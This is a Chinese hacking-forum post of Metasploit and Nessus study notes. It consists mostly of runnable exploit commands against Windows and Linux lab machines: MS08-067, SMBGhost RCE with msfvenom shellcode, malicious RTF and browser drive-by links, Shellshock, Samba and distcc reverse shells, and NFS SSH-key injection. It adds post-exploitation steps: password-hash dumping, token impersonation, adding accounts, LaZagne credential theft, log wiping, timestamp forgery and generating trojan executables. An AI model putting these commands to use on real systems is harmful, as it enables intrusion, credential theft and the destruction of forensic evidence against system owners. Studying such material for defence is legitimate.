找回密码
 立即注册
注册 登录
×
热搜: 活动 交友 discuz
查看: 112|回复: 1

Nessus扫描系统漏洞及MSF初级

[复制链接]

2

主题

2

帖子

6

积分

新手上路

Rank: 1

积分
6
发表于 2022-11-27 18:36:36 | 显示全部楼层 |阅读模式
Nessus扫描系统漏洞及MSF初级


  • 系统扫描器nessus 的使用:


  • 主机发现(涵盖了nmap的功能)
  • 基本网络扫描(涵盖了web和漏洞的扫描)
  • 认证补丁扫描(操作系统扫描)
  • ping命令基于ICMP协议
  • 天境包含漏洞库 可以工具扫描出来的漏洞进行比对

  • MSF的使用:


  • 扫描出系统漏洞之后使用MSF漏洞利用框架进行验证,kali最强大的就是MSF,windows远程桌面命令:mstsc,Kali:rdesktop
  • smb是共享文件的服务 ,modules/exploits/windows/smb,rdb是远程桌面连接服务
  • Listener(监听器)  post攻击脚本   encoders编码加密,主要做免杀  nops绕过防火墙 evasion 规避
  • moudle(模块:7大模块 /usr/share/metasploit-framework)

    • auxiliary:包含辅助脚本,包括扫描、嗅探、破解、注入、漏洞挖掘等 encoders:各种编码工具,用于躲过入侵检测和过滤系统 exploits:包含传说中各种exp、0day、漏洞利用脚本,主要攻击代码 nops:绕过防火墙 payloads:攻击载荷,攻击者发送给系统执行的指令(不包含exploits攻击阶段),payloads主要是在目标机执行的,而exploits是在本地机执行作用于目标机 post:目标机发送的一些功能性指令比如:提权,获取hash等。


    • 更新MSF,更新kali源(配置Kali官方源为中科大的源)

      • 1.vim /etc/apt/sources.list    2.注释掉官方源,加入以下中科大源,保存退出 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 3.执行 apt update 4.下载kali数字签名:wget http://archive.kali.org/archive-key.asc 5.安装数字签名:apt-key add archive-key.asc  6.卸载msf:apt remove metasploit-framework 7.安装msf:apt-get update| apt-get  install metasploit-framework 8.启动msf自带数据库:systemctl start postgresql     允许开机自启动:systemctl enable postgresql  9.构建数据库缓存:msfdb init 10.启动msf:msfconsole





    • Nessus扫描win2003及漏洞利用:

      • MS12-020漏洞利用:
      • msfconsole 进入msf控制台 search ms12-020  搜索漏洞 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids  set RHOSTS ip(win2003) exploit



    • set payload/windos 设置windows攻击木马

      • bind_tcp 正向连接
      • reverse_tcp 反向连接 | 服务器连接客户机(方便穿墙)





    • ##meterpreter后期攻击使用方法:  侵入主机从kali上传木马到受害者主机 upload 上传文件 (pcshare工具使用) execute -f 123.exe执行文件   svchost删除进程 qbcle  <b>基线检查工具pchunter的使用</b>  时间伪造 :木马文件timetomp  getsystem 提权为管理员权限 hashdump 管理员id号:500 普通用户:1000    端口转发   ----->  kali自带远程桌面连接命令 redesktop  实现连接对方远程桌面 getuid 获取当前用户|sysinfo 获取操纵系统信息|windows7查看日志|破解工具 lazagne的使用(在msf命令行下运行) 后渗透之meterpreter使用攻略xz.aliyun.com/t/2536
    • ##meterpreter(代表已经入侵成功)详细使用方法(win7 MS17-010漏洞利用为例):

      • 原理:

        • 使用pcshare工具(图形化界面木马)远程控制对方电脑(why:windows下命令行控制对方电脑命令行比较费劲,直接使用pchare上传木马图形化控制对方电脑)
        • 只是控制对方电脑,没有什么危害,不是病毒





      • 步骤:

        • 打开pcshare,点击创建用户,选择本机ip,生成木马,然后使用rz上传到Kali










        • msf里执行upload命令上传木马到目的主机:










        • 目标主机上执行exe文件:execute -f c://123.exe
        • 远程操控成功!!!!





      • 获取admin权限:

        • getsystem 提升为系统权限
        • getuid 查看当前用户权限
        • hashdump  查看当前用户所有账号的hash密码
        • sysinfo 获取操作系统信息
        • use incognito  使用incognito模块
        • list_tokens -u  显示所有用户有效的tokens
        • impersonate_token “Machine\\user” 切换用户
        • shell
        • net user add sanhe 新增用户







      • 端口转发:

        • meterpreter shell中的portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。
        • portfwd add -l 6666 -p 3389 -r 127.0.0.1  #将目标机的3389端口转发到本地6666端口










        • 进入kali系统终端执行:rdesktop 127.0.0.1:6666 进入远程桌面连接





      • 时间伪造:

        • timestomp C:// -h   #查看帮助
        • timestomp -v C://2.txt   #查看时间戳
        • timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt







      • 开启远程桌面:

        • run post/windows/manage/enable_rdp  #开启远程桌面





      • 日志清除:

        • clearev  #清除windows中的应用程序日志、系统日志、安全日志









      • 上传密码读取工具LaZagn(重命名为mima.exe)读取肉鸡的账号密码:

        • 上传LaZagn.exe到肉鸡: upload //root//mima.exe c:\\mima.exe
        • shell     #进入肉鸡命令行
        • cd  \ : mima.exe /?
        • mima.exe all>>2.txt





      • 后渗透之meterpreter使用攻略:http://xz.aliyun.com/t/2536





    • 基线检查工具pchunter的使用


  • 中间件漏洞ms15-034漏洞讲解:(wiin7系统--->windows功能打开IIS,asp,性能)启动IIS,绑定网站


  • msf 搜索 ms15-034 攻击主机  |  修复该漏洞:IIS管理器溢出缓存关闭即可




  • win2003 网络服务器攻击渗透ms08-067漏洞验证:


  • msf搜索:search ms08-067
  • msf6 >use exploit/windows/smb/ms08_067_netapi
  • msf6 >set RHOSTS win3ip
  • msf6 >set target  Windows 2003 SP2 Chinese - Simplified (NX)
  • msf6 >run

  • winxp 浏览器攻击渗透ms10-018漏洞验证(浏览器漏洞,跟浏览器版本有关系,跟操作系统没有关系):


  • msf6 >search ms10-018
  • msf6 >use windows/browser/ms10_018_ie_behaviors
  • msf6 >set srvhost 192.168.56.133(kali主机ip)
  • msf6 >set lport 4441
  • msf6 >exploit
  • 生成挂马链接:http://192.168.56.133:8080/gaNfbbCtSSFayw
  • 设置病毒文件,使IE6、IE7浏览器访问到这个链接即可完成木马植入
  • session -i 已经建立连接

  • 应用软件格式渗透,利用word去渗透(MS10-087):


  • msf6 >search ms10-087
  • msf6 >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
  • msf6 >exploit  #生成msf.rtf文件,使winxp系统使用word打开这个文件即可入侵该系统

  • win10主机(关闭防火墙、病毒,ping通网络)CVE-2020-0796-Poc漏洞讲解:


  • 上传Poc检查工具至kali:scaner.py(github下载 https://github.com/ollypwn/SMBGhost)  kali终端执行:python3 scanner.py  IP(win10) 攻击成功使用windows提权工具进行提权 | 如果不行上传图形化木马pcshare进行操作  有关msfvenom详细使用可参考 https://www.jianshu.com/p/dee2b171a0a0
  • 攻击测试:
  • #root>>git  clone https://github.com/ollypwn/SMBGhost     #poc检测工具下载
  • #root>>python3 scanner.py  192.168.56.166                          #检测漏洞是否存在
  • #root>>git clone https://github.com/eerykitty/CVE-2020-0796-PoC    #下载漏洞攻击工具poc
  • #root>>python3 CVE-2020-0796.py 192.168.56.166               #攻击测试,蓝屏表示攻击成功
  • 漏洞利用-获取getshell:
  • #root>>git clone  https://github.com/chompie1337/SMBGhost_RCE_PoC.git   #攻击脚本下载
  • #root>>msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python        #msfvenom选择一个payload(-p) 设置正向连接(bind_tcp) 来源端口4444  避免出现\x00(-b)选择脚本(python)
  • #root>>cd /gitdownload/SMBGHOST_RCE_PoC
  • #root>>vim exploit.py                         #将生成的攻击脚本替换为exploit.py里的脚本
  • 进入msf开始漏洞利用:
  • msf6 > use exploit/multi/handler
  • msf6 > set payload windows/x64/meterpreter/bind_tcp
  • set lport 8888 //监听端口
  • set RHOST 192.168.56.166
  • exploit         //开启监听
  • 新开kali窗口执行: python3 exploit.py -ip 192.168.56.166   #攻击命令
  • 执行成功后监听有缓存,按下ctrl+c,然后run即可进入拿到system权限
  • 如果攻击的不是管理员,下载win10提权工具:
  • https://github.com/danigargu/CVE-2020-0796/releases
  • 如果提示找不到dll文件,那么
    在win10上安装个vc运行库就好了

  • Linux系统漏洞利用:


  • metasploitable-linux 虚拟机安装 | 切换root账号 nessue扫描Linux系统漏洞  百度搜索扫描出来的漏洞 进行利用 telnet ip 端口  ##进行连接 破壳漏洞利用  php CGI漏洞利用    Druby 漏洞利用
  • 高危漏洞-NFS Exported Share Information Disclosure(NFS 导出的共享信息披露漏洞利用):

    • rpcinfo -p 192.168.56.154             #显示本地系统中注册到rpcbind协议版本2的所有RPC服务
    • showmount -e  192.168.56.154    #显示被挂载的共享目录
    • ssh-keygen                                   #生成私钥
    • mkdir /tmp/test
    • mount -t nfs 192.168.56.154:/ /tmp/test
    • cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys
    • ssh root@192.168.56.154


    • UnrealIRCd 后门检测漏洞利用:

      • msf搜索:search cve:2010-2075
      • set RHOSTS 192.168.56.154
      • set payload cmd/unix/bind_perl
      • run





    • 利用 samba 服务(SMB协议的一个免费软件,端口139、445)漏洞入侵linux主机(samba低版本漏洞利用):

      • use auxiliary/scanner/smb/smb_version   #使用辅助模块来搜索有没有smb服务漏洞
      • set RHOSTS 192.168.56.154                        #设置目标主机
      • exploit
      • use exploit/multi/samba/usermap_script    #使用攻击模块来测试smb漏洞
      • set RHOST 192.168.56.154
      • exploit   #攻击成功



    • Bash Shellshock CVE-2014-6271(破壳)漏洞利用:

      • 原理:

        • Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。
        • 简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。







      • 详细步骤:

        • 靶机cd到 /usr/lib/cgi-bin/   然后执行  sudo nano hello.sh
        • vi  hello.sh >>#! /bin/bash
                                          echo "Content-type: text/html"
                                          echo ""
                                          echo "Hello world!"
        • sudo chmod 755 hello.sh
        • 进入msf控制台:search  shellshock
        • use   multi/http/apache_mod_cgi_bash_env_exec
        • set RHOSTS  192.168.56.154
        • set targeturi /cgi-bin/hello.sh
        • set payload linux / x86 / shell / reverse_tcp
        • check   #查看靶机是否存在漏洞
        • exploit




    • PHP CGI漏洞利用:

      • msf搜索:search cve:2012-1823
      • use exploit/multi/http/php_cgi_arg_injection
      • show options
      • set rhost 192.168.56.154
      • exploit  #攻击成功





    • Distcc后门漏洞:

      • use exploit/unix/misc/distcc_exec
      • set payload cmd/unix/reverse_perl
      • set rhost  (ip address)
      • set lhost  (ip address)
      • exploit



  • msf木马生成并且木马免杀:


  • 木马生成:

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.17.194 LPORT=4444 -f exe -o payload.exe


    • 开启本地监听:

      • msf > use exploit/multi/handler
      • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
      • msf exploit(handler) > set lhost 192.168.56.133(kali 主机)
      • msf exploit(handler) > set lport 4444
      • msf exploit(handler) > exploit


回复

使用道具 举报

1

主题

3

帖子

7

积分

新手上路

Rank: 1

积分
7
发表于 2025-3-6 01:41:14 | 显示全部楼层
介是神马?!!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋| 黑客通

GMT+8, 2025-4-7 14:21 , Processed in 0.101072 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2020, LianLian.

快速回复 返回顶部 返回列表